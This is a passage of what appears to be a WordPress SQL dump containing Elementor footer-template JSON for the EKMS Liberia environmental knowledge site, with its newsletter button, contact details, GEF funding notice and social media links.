{display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25797,3800,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25799,404,'_wp_old_date','2019-11-08'),(25800,127,'_wp_old_date','2019-11-08'),(25801,125,'_wp_old_date','2019-11-08'),(25802,117,'_wp_old_date','2019-11-08'),(25803,123,'_wp_old_date','2019-11-08'),(25804,120,'_wp_old_date','2019-11-08'),(25805,114,'_wp_old_date','2019-11-08'),(25806,118,'_wp_old_date','2019-11-08'),(25807,129,'_wp_old_date','2019-11-08'),(25808,115,'_wp_old_date','2019-11-08'),(25809,126,'_wp_old_date','2019-11-08'),(25810,1842,'_wp_old_date','2019-11-12'),(25811,124,'_wp_old_date','2019-11-08'),(25812,2509,'_wp_old_date','2019-11-16'),(25813,2596,'_wp_old_date','2019-11-20'),(25814,2746,'_wp_old_date','2019-11-25'),(25816,116,'_wp_old_date','2019-11-08'),(25817,3805,'_elementor_edit_mode','builder'),(25818,3805,'_elementor_template_type','footer'),(25819,3805,'_elementor_version','3.7.8'),(25820,3805,'_elementor_pro_version','3.7.7'),(25821,3805,'_edit_lock','1686916731:42'),(25822,3806,'_elementor_edit_mode','builder'),(25823,3806,'_elementor_template_type','footer'),(25824,3806,'_elementor_version','3.3.1'),(25825,3806,'_elementor_pro_version','3.3.6'),(25826,3805,'_wp_page_template','default'),(25827,3805,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contribute\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":8.8390000000000004121147867408581078052520751953125},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.535000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":34.18500000000000227373675443232059478759765625,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":46.441000000000002501110429875552654266357421875},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22%26copy%3B%20%22%2C%22after%22%3A%22%20%3Ca%20href%3D%5C%22https%3A%2F%2Fekmsliberia.info%2F%5C%22%20title%3D%5C%22Go%20Home!%5C%22%3EEKMS%3C%2Fa%3E.%20All%20Rights%20Reserved.%20%20Managed%20by%20the%20Environmental%20Protection%20Agency%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25828,3807,'_elementor_edit_mode','builder'),(25829,3807,'_elementor_template_type','footer'),(25830,3807,'_elementor_version','3.3.1'),(25831,3807,'_elementor_pro_version','3.3.6'),(25832,3807,'_wp_page_template','default'),(25833,3807,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[{\"id\":\"da6e6b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/white_bg_seal.png\",\"id\":371,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":37.035,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.983},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":50.593,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}],\"gap\":\"no\"},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.472},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":34.283},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":50.578},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25836,3805,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25838,3808,'_elementor_edit_mode','builder'),(25839,3808,'_elementor_template_type','footer'),(25840,3808,'_elementor_version','3.3.1'),(25841,3808,'_elementor_pro_version','3.3.6'),(25842,3808,'_wp_page_template','default'),(25843,3808,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our 